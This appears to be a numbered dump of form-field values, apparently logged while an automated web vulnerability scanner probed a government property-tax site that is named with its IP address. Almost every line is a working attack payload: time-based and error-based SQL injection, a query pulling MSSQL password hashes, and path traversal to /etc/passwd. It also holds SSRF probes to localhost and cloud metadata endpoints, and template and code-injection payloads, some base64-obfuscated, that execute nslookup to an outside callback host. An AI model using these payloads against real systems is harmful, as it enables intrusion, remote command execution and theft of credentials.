8288 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
8289 /../../../../../../../../../../../etc/passwd
8290
8291
8292 Smith
8293 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
8294
8295 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6rbolbc2r-szbx8uvlmxjvi2ahrglwl'||'r2o.r87.me') from DUAL))))
8296 Smith
8297 . . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
8298 Smith
8299 http://127.0.0.1:22
8300 1)) WAITFOR DELAY '0:0:25'-- /* a894c87e-40dd-4eb0-9b1d-ea294d921e1d */
8301 Smith
8302 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
8303 Smith
8304 /../../../../../../../../../../var/log/apache2/access.log
8305 Smith
8306 1)) WAITFOR DELAY '0:0:1'-- /* 943a36f6-1286-4d56-9524-5b728554a9a8 */
8307
8308 Smith
8309 Smith
8310
8311 Smith
8312
8313 Smith (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(101)||chr(112)||chr(118)||chr(120)||chr(115)||chr(104)||chr(97)||chr(112)||chr(117)||chr(119)||chr(119)||chr(114)||chr(106)||chr(122)||chr(105)||chr(109)||chr(108)||chr(116)||chr(112)||chr(110)||chr(103)||chr(95)||chr(98)||chr(50)||chr(121)||chr(104)||chr(106)||chr(117)||chr(106)||chr(114)||chr(120)||chr(120)||chr(121)||chr(46)||chr(114)||chr(56)||chr(55)||chr
8314 (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(108)||chr(111)||chr(49)||chr(53)||chr(99)||chr(50)||chr(108)||chr(103)||chr(105)||chr(110)||chr(110)||chr(118)||chr(50)||chr(109)||chr(103)||chr(108)||chr(102)||chr(112)||chr(114)||chr(118)||chr(103)||chr(109)||chr(101)||chr(98)||chr(98)||chr(121)||chr(108)||chr(115)||chr(97)||chr(101)||chr(57)||chr(108)||chr(107)||chr(46)||chr(1
8315 Smith
8316 http://[::1]:3306
8317
8318 Smith
8319 Smith
8320 1)) WAITFOR DELAY '0:0:1'-- /* b2c84fe8-199a-413d-856b-0e4f179145fc */
8321
8322 Smith
8323 <% response.write(268409241-42109) %>
8324
8325
8326 ...//...//...//...//...//...//...//...//...//...//...//etc/passwd
8327 Smith
8328 Smith
8329 %27
8330 Smith
8331
8332
8333 Smith
8334 |expr${IFS}268409241${IFS}-${IFS}86336
8335 (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(111)||chr(103)||chr(45)||chr(121)||chr(110)||chr(98)||chr(104)||chr(114)||chr(97)||chr(104)||chr(120)||chr(104)||chr(99)||chr(118)||chr(105)||chr(54)||chr(99)||chr(107)||chr(51)||chr(55)||chr(103)||chr(95)||chr(108)||chr(107)||chr(101)||chr(113)||chr(104)||chr(120)||chr(110)||chr(119)||chr(112)||chr(109)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)|
8336 Smith (select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(108)||chr(105)||chr(107)||chr(121)||chr(106)||chr(57)||chr(109)||chr(100)||chr(118)||chr(45)||chr(118)||chr(108)||chr(110)||chr(105)||chr(103)||chr(117)||chr(106)||chr(55)||chr(107)||chr(102)||chr(50)||chr(100)||chr(118)||chr(98)||chr(45)||chr(110)||chr(118)||chr(50)||chr(48)||chr(114)||chr(114)||chr(108)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)|
8337 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
8338 Smith
8339 Smith
8340 Smith
8341
8342
8343
8344 Smith
8345 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* cfa163a0-866b-450b-8510-dd46821e15d1 *
8346 Smith
8347 Smith (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(48)||chr(97)||chr(100)||chr(122)||chr(117)||chr(95)||chr(113)||chr(114)||chr(104)||chr(108)||chr(103)||chr(52)||chr(120)||chr(108)||chr(122)||chr(108)||chr(103)||chr(114)||chr(53)||chr(120)||chr(113)||chr(100)||chr(100)||chr(114)||chr(111)||chr(110)||chr(122)||chr(57)||chr(118)||chr(115)||chr(118)||chr(103)||chr(103)||chr(46)||ch
8348
8349 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
8350
8351
8352
8353 Smith
8354 Smith
8355
8356 +print(int)0xFFF9999-43701;//
8357 Smith '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(109)||chr(121)||chr(97)||chr(119)||chr(51)||chr(121)||chr(97)||chr(107)||chr(116)||chr(120)||chr(55)||chr(57)||chr(55)||chr(54)||chr(48)||chr(115)||chr(98)||chr(101)||chr(56)||chr(117)||chr(120)||chr(104)||chr(54)||chr(122)||chr(56)||chr(115)||chr(116)||chr(117)||chr(122)||chr(105)||chr(52)||chr(103)||chr(119)||chr(46)||chr(114)||chr(
8358
8359 Smith
8360 '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(116)||chr(98)||chr(105)||chr(113)||chr(118)||chr(101)||chr(100)||chr(115)||chr(113)||chr(54)||chr(53)||chr(117)||chr(97)||chr(102)||chr(106)||chr(116)||chr(49)||chr(104)||chr(106)||chr(103)||chr(118)||chr(106)||chr(109)||chr(112)||chr(115)||chr(52)||chr(56)||chr(100)||chr(121)||chr(110)||chr(111)||chr(112)||chr(104)||chr(53)||chr(106)||chr(122)||chr(120)||chr(48)||chr(107)||chr(97)||chr(104)||chr(57)||chr(109)||chr(46)||chr(114)||
8361 ((select sleep(25)))a-- 1 /* 06b1799b-b9fa-4ca5-b2ec-f5f15d2ffae1 */
8362
8363
8364 |expr 268409241 - 27961
8365 "+print(int)0xFFF9999-95072+"
8366 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
8367 Smith
8368 Smith
8369 ((select sleep(25)))a-- 1 /* 588158db-20cb-4463-94ea-627e57f84cf2 */
8370 Smith
8371 "+print(int)0xFFF9999-82945+"
8372 Smith
8373
8374 Smith
8375 Smith
8376 Smith
8377 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
8378 ....//....//....//....//....//....//....//....//....//....//....//etc/passwd
8379 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR
8380
8381 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
8382 Smith
8383 (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
8384 /../../../../../../../../../../etc/httpd/logs/access.log
8385
8386
8387
8388 Smith
8389
8390
8391 https://propertytax.jk.gov.in/server-status
8392 Smith
8393 /../../../../../../../../../../etc/httpd/logs/access.log
8394 /../../../../../../../../../../opt/lampp/logs/access_log
8395 /../../../../../../../../../../opt/lampp/logs/access_log
8396
8397 Smith
8398 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/*
8399 Smith
8400
8401 '{${print(int)0xFFF9999-26275}}'
8402 Smith https://metadata.platformequinix.com/metadata
8403 Smith
8404
8405 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
8406 Smith
8407
8408 Smith
8409 Smith
8410 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/*
8411
8412
8413 Smith
8414
8415 Smith
8416 Smith
8417
8418
8419 Smith
8420 1/../../../../../../../../../../../etc/passwd
8421 '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
8422 Smith
8423 "+print localtime()*0+0xFFF9999-76817+"
8424 Smith
8425 Smith
8426 Smith
8427
8428 Smith
8429 data:;base64,TlM3NzU0NTYxNDQ2NTc1
8430 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
8431
8432 Smith
8433 arguments[1].end(require('child_process').execSync('set /A 268409241 - 21154'))
8434 Smith
8435 arguments[1].end(require('child_process').execSync('expr 268409241 - 89586'))
8436 Smith
8437 Smith
8438 %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-82890)}
8439
8440 Smith
8441 Smith
8442
8443 Smith
8444 p "#{0xFFF9999.to_i-`echo 11771`.to_i}"
8445
8446
8447 Smith
8448 Smith
8449 /../../../../../../../../../../AppServ/Apache24/logs/access.log
8450
8451 /../../../../../../../../../../AppServ/Apache24/logs/access.log
8452 Smith
8453
8454
8455 Smith
8456
8457 Smith
8458 Smith
8459
8460 Smith
8461
8462
8463 1';SELECT pg_sleep(25)-- /* 78a57b42-00f9-4b9d-a888-a348cf5da0ff */
8464 (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(10
8465 faq.aspx
8466 Smith
8467 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
8468 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
8469
8470 Smith
8471 WEB-INF/web.xml
8472
8473 '" ns=netsparker(0x057FA1)
8474 '+NSFTW+'
8475 Smith +createobject("WScript.Shell").exec("nslookup tbiqvedsq6fgirhxh6wwtgudxktxc_xzbkwhsm3p" & "a7o.r87.me").StdOut.ReadAll
8476 Smith
8477 Smith
8478 /../../../../../../../../../../WEB-INF/web.xml
8479 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49)
8480 1';SELECT pg_sleep(1)-- /* e1c1519b-fd52-477e-9c17-181b98e128eb */
8481
8482
8483 Smith
8484 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
8485 Smith
8486 Smith
8487 1 ns=netsparker(0x05802B)
8488 Smith
8489 Smith
8490 /../../../../../../../../../../var/log/lighttpd/access.log
8491 Smith
8492
8493 1';SELECT pg_sleep(25)-- /* 6bd1a648-af55-4fce-a948-6768b94a5a39 */
8494 "+gethostbyname(lc 'tbiqvedsq6gjqsklcjl47egnbnahl93b1fyr0iwf'.'bfq.r87.me')+"
8495 Smith '+gethostbyname(lc 'tbiqvedsq6k1t7poi4dw4itoazewlq0sq2p66jrx'.'ruy.r87.me')+'
8496 Smith
8497 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SEL
8498 Smith
8499 Smith
8500 Smith
8501 Smith
8502 "& nslookup tbiqvedsq6csjyug5v29k4rfjtzoh7ipqtmsqi74^qek.r87.me&'\"`0&nslookup tbiqvedsq6csjyug5v29k4rfjtzoh7ipqtmsqi74^qek.r87.me&`'
8503
8504 Smith https://propertytax.jk.gov.in/trace.axd
8505 https://propertytax.jk.gov.in/trace.axd
8506 Smith
8507 1';SELECT pg_sleep(1)-- /* a3094776-f11c-4986-92c0-177cd3e13dec */
8508
8509 Smith '& nslookup tbiqvedsq6zscyuqoymf3dnlduypgjlhlx6gv6-f^j_4.r87.me&'\"`0&nslookup tbiqvedsq6zscyuqoymf3dnlduypgjlhlx6gv6-f^j_4.r87.me&`'
8510
8511 Smith
8512 Smith
8513
8514 1';SELECT pg_sleep(1)-- /* a3094776-f11c-4986-92c0-177cd3e13dec */
8515 164.100.223.17/trace.axd
8516 Smith
8517 1';SELECT pg_sleep(1)-- /* 7419ae00-bc96-4b69-a47c-9937a55559b4 */
8518 Smith
8519 [::1]/trace.axd
8520
8521
8522
8523
8524 https://propertytax.jk.gov.in/elmah.axd
8525 Smith
8526 ((select sleep(25)))a-- 1 /* d74fd374-bc7a-4be5-bea4-e0dbfdfe5311 */
8527 netsparker(0x05858D);
8528 https://propertytax.jk.gov.in/elmah.axd
8529
8530 /../../../../../../../../../../var/log/apache/access.log
8531 https://propertytax.jk.gov.in/elmah.axd
8532 netsparker(0x05858C);
8533 Smith
8534 Smith https://propertytax.jk.gov.in/elmah.axd
8535 127.100.11.2/trace.axd
8536 Smith
8537 '+gethostbyname(trim('tbiqvedsq6jsnpxedx1bhdk-uxy3ngvd0z2nmmkh'.'xri.r87.me'))+'
8538 Smith
8539
8540 Smith {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup tbiqvedsq64u6bwbencifanyijbgflkkczoho-7o"~"ry8.r87.me")}}
8541 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)|
8542 -1 OR 1=1
8543 '+gethostbyname(trim('tbiqvedsq6kw8qbmegkbbriata4gjkzuc4rvhbuu'.'ste.r87.me'))+'
8544
8545
8546 Smith
8547 -1 OR 1=1
8548 Smith
8549 "+gethostbyname(trim('tbiqvedsq6cgrkayw-miod-jcktg0boz9z1bl_a4'.'xom.r87.me'))+"
8550 Smith
8551 Smith
8552
8553 Smith
8554 NS-1NO
8555 Smith
8556
8557 -1 OR 1=1
8558 ' OR 0=1 OR
8559 SELECT pg_sleep(25)-- /* 87dcf685-39ef-4df7-981d-602a669ba7ca */
8560 //r87.com/?0x058B69
8561 -1' OR 1=1 OR '1'='1
8562 Smith
8563
8564 SELECT pg_sleep(1)-- /* 235b0731-2ab7-4516-8d01-da409cabd063 */
8565 1;SELECT pg_sleep(25)-- /* aef6df7d-f382-43be-9f6e-869cb9b2a255 */
8566
8567 -1' OR 1=1 OR '1'='1
8568 Smith <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNnI5cGMxd3pha2k2azZvbnV3YWlreHRxYmNlbGdueHNqNC5yODcubWU=')})).to_s}" %>
8569 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgdGJpcXZlZHNxNml6czBkZi1heHZ1ZWNoeGRfNmtuZDFldW92NHd4Z2YybS5yODcubWU=')})).to_s}" %>
8570 -1" OR 1=1 OR "1"="1
8571 '{${gethostbyname(trim('tbiqvedsq6w_4mxvhdkqqdhbxgkbmbfq9kb8usy3'.'g7k.r87.me'))}}'
8572 Smith
8573 propertytax.jk.gov.in/elmah.axd
8574 propertytax.jk.gov.in/elmah.axd
8575 //r87.com/?0x058B6A
8576 SELECT pg_sleep(1)-- /* 80519eea-4b75-4d80-a467-0d7daabce791 */
8577 -1" OR 1=1 OR "1"="1
8578
8579 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
8580 ' OR 0=1 OR
8581 Smith
8582 Smith
8583
8584
8585 SELECT pg_sleep(25)-- /* b7380c99-5c1b-4296-b44c-225440abd593 */
8586 -1 OR 'X'='ss
8587 -1' OR 1=1 OR 'ns'='ns
8588
8589
8590
8591 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6umsuhxdmut4zqlpkd9th75oefm8m4z"+"-ks.r87.me") }
8592 -1" OR 1=1 OR "ns"="ns
8593
8594 -1 OR 17-7=10
8595 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr
8596 -1 OR NS='ss
8597 '{${gethostbyname(trim('tbiqvedsq6viuxtrnl7otz_syuqc5ldjy1jjo9oa'.'okw.r87.me'))}}'
8598 -1 OR 1=1
8599
8600 -1 OR 1=1
8601 -1 OR 1=1
8602 Smith
8603 -1 OR 1=1
8604 ' OR 0=1 OR
8605 NS-1NO
8606
8607 Smith <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6eeqx7pq8nljhm5yvcuur6ujxwqwxs9"+"05u.r87.me") }
8608 Smith
8609 Smith
8610 -1 OR 'X'='ss
8611 Smith
8612 Smith
8613 Smith
8614 -1' OR 1=1 OR 'ns'='ns
8615 Smith
8616 createobject("WScript.Shell").exec("nslookup tbiqvedsq6nrucdev6mchd0p96stn9jwq6huqjvz" & "c1g.r87.me
8617 Smith
8618 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
8619 -1" OR 1=1 OR "ns"="ns
8620
8621 -1 OR 17-7=10
8622 -1 OR NS='ss
8623 require 'resolv';Resolv.getaddress ("tbiqvedsq6-8-qcvru-xkj8m9dlis9x5akbrw9vp".concat "shw.r87.me")
8624 1);SELECT pg_sleep(25)-- /* 583ba7a7-7de3-4a81-907b-380f3846e926 */
8625 -1' OR 1=1 OR '1'='1
8626 -1' OR 1=1 OR '1'='1
8627
8628 -1" OR 1=1 OR "1"="1
8629 +createobject("WScript.Shell").exec("nslookup tbiqvedsq694c-27dolmkwvf6ibd4j6jefqe0hvu" & "k1y.r87.m
8630 createobject("WScript.Shell").exec("nslookup tbiqvedsq6n6uof1peaoba_k3yoi0n6pkwcfze90" & "oyi.r87.me
8631 Smith
8632 -1" OR 1=1 OR "1"="1
8633 Smith require 'resolv';Resolv.getaddress ("tbiqvedsq63e7anvflwhlh_og1as-ytfoepdghnt".concat "xl8.r87.me")
8634 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(1
8635 Smith
8636 Smith
8637 1);SELECT pg_sleep(25)-- /* 569a758a-f190-4f18-afa6-c59a95dea219 */
8638 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNjNieDJ4Nmd5YmN3d3hiMWNpZGtpazloYmFocWhscGtiOC5yODcubWU=')).read()
8639
8640 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6p4bnwixx8owm_15jwjd8kawgvkq4ly" & "p3o.r87.m
8641
8642 1);SELECT pg_sleep(1)-- /* 05b1db16-de8c-4c19-87ec-becc07512250 */
8643
8644 Smith
8645 1);SELECT pg_sleep(1)-- /* 0b5d1309-9200-4de5-b49e-5e5bbabf186a */
8646 //r87.com/n/j/?0x059266
8647 1);SELECT pg_sleep(30)-- /* 26795fdc-0eb4-4afe-9ce3-67218671eab7 */
8648 Smith __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNjgxcHR6Z2s3Z3Jycm55c2dwZDZ6M3d0bmpvMG9kOWg5YS5yODcubWU=')).read()
8649 Smith
8650 1);SELECT pg_sleep(30)-- /* 512c0699-3232-42a8-bed9-30cc4d585718 */
8651 Smith
8652 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6cs63vunh0fgaeh72_7dr6f5unnr1i1" & "fs4.r87.m
8653
8654 Smith
8655
8656 Smith
8657 Smith
8658 Smith
8659 Smith
8660 Smith
8661 1';SELECT pg_sleep(25)-- /* ef09ec85-6a5c-4ed9-bc54-530f3b705816 */
8662 propertytax.jk.gov.in/elmah.axd
8663 "& ping -n 25 127.0.0.1 &
8664 Smith
8665 "& ping -n 1 127.0.0.1 &
8666
8667 1');SELECT pg_sleep(25)-- /* 679a7611-dddd-4be6-93f3-bf47b39741c2 */
8668 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6e6-scthteqegnefzn6a1b6-9i5q_xc" & "gqm.r87.m
8669 require('dns').lookup('tbiqvedsq6wfedpmeaiutj5uhgvmahvtjfk1jhhp'.concat('grs.r87.me'),_=>_)
8670 Smith propertytax.jk.gov.in/elmah.axd
8671
8672 ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6_cw8ezu31lb0d7wxiggxr6kmq3_fym'+'oyw.r87.me')}
8673 Smith require('dns').lookup('tbiqvedsq6clglhyru_bsfhelqg_822fy9oncxeu'.concat('9zc.r87.me'),_=>_)
8674 Smith
8675 "& ping -n 1 127.0.0.1 &
8676 Smith
8677 Smith
8678 1';SELECT pg_sleep(25)-- /* 589b7136-a5c9-4fdb-99fa-186e3c7dcf83 */
8679 Smith
8680 Smith
8681 Smith
8682 Smith
8683 Smith
8684
8685 //r87.com/n/j/?0x059267
8686
8687 1');SELECT pg_sleep(25)-- /* 6d0fcea5-6085-42d0-9eee-8c3dd886077e */
8688 Smith
8689 Smith
8690 "& ping -n 25 127.0.0.1 &
8691 Smith
8692 Smith
8693 164.100.223.17/elmah.axd
8694 Smith
8695 Smith
8696 Smith ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6nprbelqzblr7ikely2xnptlbg5fd3r'+'-ui.r87.me')}
8697 164.100.223.17/elmah.axd
8698 Smith
8699 <%createobject("WScript.Shell").exec("nslookup tbiqvedsq6yqjv7xmkuyd6hrnp6pfffaj3ayw16p" & "nd0.r87.
8700 \";netsparker(0x059634);///
8701 Smith
8702 Smith
8703 Smith
8704 1;SELECT pg_sleep(25)-- /* 38faaf37-5629-413d-a15f-9c2105ae58cb */
8705 '& ping -n 25 127.0.0.1 &
8706 Smith
8707
8708 1'));SELECT pg_sleep(25)-- /* d93f547d-d845-4755-98f0-847d47d56c25 */
8709 Smith
8710 Smith
8711 Smith
8712 Smith
8713 Smith
8714 Smith
8715
8716 1;SELECT pg_sleep(25)-- /* 7f46bf3b-abd1-407e-bf3f-effc3dfc52d5 */
8717 Smith
8718 <%createobject("WScript.Shell").exec("nslookup tbiqvedsq6q-7-elfkakhfrqcq2wqnwmyvemskjd" & "hdw.r87.
8719 \";netsparker(0x059635);///
8720 Smith
8721
8722 Smith
8723 Smith
8724 '& ping -n 25 127.0.0.1 &
8725 Smith
8726
8727 Smith
8728 "+createobject("WScript.Shell").exec("nslookup tbiqvedsq62cu_csidanfwgww8sp-evk0v0a-9xl" & "rja.r87.
8729 Smith
8730
8731
8732 ;netsparker(0x059A93)//\
8733 Smith 164.100.223.17/elmah.axd
8734 164.100.223.17/elmah.axd
8735 "+createobject("WScript.Shell").exec("nslookup tbiqvedsq6umjifder2ieawxqpnykwan-gpgv35z" & "tye.r87.
8736 1'));SELECT pg_sleep(25)-- /* 7aad0b22-217d-49e4-8156-82ce79f64fa0 */
8737
8738 SELECT pg_sleep(25)-- /* 6a3b0877-d50a-4666-9906-a2a817d08aab */
8739 Smith
8740 Smith -1 OR 1=1
8741 Smith -1 OR 1=1
8742 Smith
8743 Smith -1 OR 1=1
8744 Smith -1 OR 1=1
8745 eval('gethostbyname(lc 'tbiqvedsq617zu0z0qe0bogp4mwizkz6zyveqges'.'ism.r87.me')')
8746 Smith
8747 Smith
8748
8749
8750 & ping -n 25 127.0.0.1 &
8751 Smith ' OR 1=1 OR '1'='1
8752 Smith
8753 1));SELECT pg_sleep(25)-- /* 53a72bb3-ab45-403b-9725-8b4118df05f3 */
8754
8755 nslookup tbiqvedsq6vy0hyuyvmkuery010cwec1xfhm0yzi^0t8.r87.me&'\"`0&nslookup tbiqvedsq6vy0hyuyvmkuery
8756
8757 Smith +response.write(268409241-84347)'
8758 Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
8759 [::1]/elmah.axd
8760 Smith
8761
8762 & ping -n 1 127.0.0.1 &
8763 Smith ' OR 1=1 OR '1'='1
8764 <% response.write(268409241-84599) %>
8765 127.0.0.1/elmah.axd
8766
8767 '+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 5f00ca14-593a-4868-a6f5-8fa9b85f40a0 */
8768 Smith
8769
8770 Smith " OR 1=1 OR "1"="1
8771 https://propertytax.jk.gov.in/elmah
8772 1);SELECT pg_sleep(25)-- /* 86e0124a-9a7d-465a-9f6a-8c9e1be52262 */
8773
8774 Smith https://propertytax.jk.gov.in/elmah
8775 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
8776 Smith 164.100.223.17/elmah
8777 & ping -n 25 127.0.0.1 &
8778 1');SELECT pg_sleep(25)-- /* 86271c4d-2dc5-43fd-abcd-badd2aedb17f */
8779 Smith 127.0.0.1/elmah
8780 cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
8781 Smith {php}print(int)0xFFF9999-74708;{/php}
8782 1');SELECT pg_sleep(1)-- /* a42b7eca-95be-4c97-b969-3988be851013 */
8783 Smith
8784
8785
8786 & ping -n 1 127.0.0.1 &
8787 /elmah
8788 Smith
8789 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNjRt
8790 Smith
8791
8792
8793 Smith
8794 {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq6ojd7mcyz3ojp08woxduxed8boa0ymx"."
8795 Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
8796 http://127.0.0.1:3306
8797 Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
8798 Smith
8799 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 8c9683ae-734d-4f64-8761-91477db299ce */
8800 Smith
8801 http://[::1]:22
8802
8803
8804 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* faf9fb03-0ce5-4ce7-af71-86dbe3171939 */
8805
8806 '+NSFTW+'
8807 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup tbiqvedsq6pe-rwlw
8808 1'));SELECT pg_sleep(25)-- /* 84e12766-cec0-4b20-b3a8-81d714af440b */
8809 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(1))A))+" /* 2f7a10c3-f952-4063-99a8-1a0ee31ac09b */
8810 Smith arguments[1].end(require('child_process').execSync('set /A 268409241 - 4926'))
8811 Smith
8812 Smith
8813 Smith http://164.100.223.17:3306
8814
8815 http://127.0.0.1:3306
8816 Smith
8817 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
8818
8819 Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
8820 https://metadata.packet.net/metadata
8821 Smith
8822 1'));SELECT pg_sleep(25)-- /* b64905b4-7fc3-4b7d-9024-b9eec5c78c76 */
8823
8824 "&ping -w 25 127.0.0.1 &"
8825
8826 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(30))A))+" /* 5bf87f21-8b99-4669-a71c-e8b6ffa1e525 */
8827 "&ping -w 1 127.0.0.1 &"
8828 Smith __import__('os').popen(('SET /A 268409241 - {0}').format('90403')).read()
8829 Smith
8830 Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
8831 Smith
8832 ((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 05d2f422-d07d-4341-ab76-018c50b8820a */
8833 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password
8834 -1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* ef3bc448-c1b2-4474-bd71-73f209ea4a0d */
8835 Smith
8836
8837 "&ping -w 1 127.0.0.1 &"
8838 Smith
8839 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
8840 ((SELECT(1)FROM(SELECT(SLEEP(1)))A)) /* 31626a4d-e27a-4e65-a938-51189123aeb8 */
8841
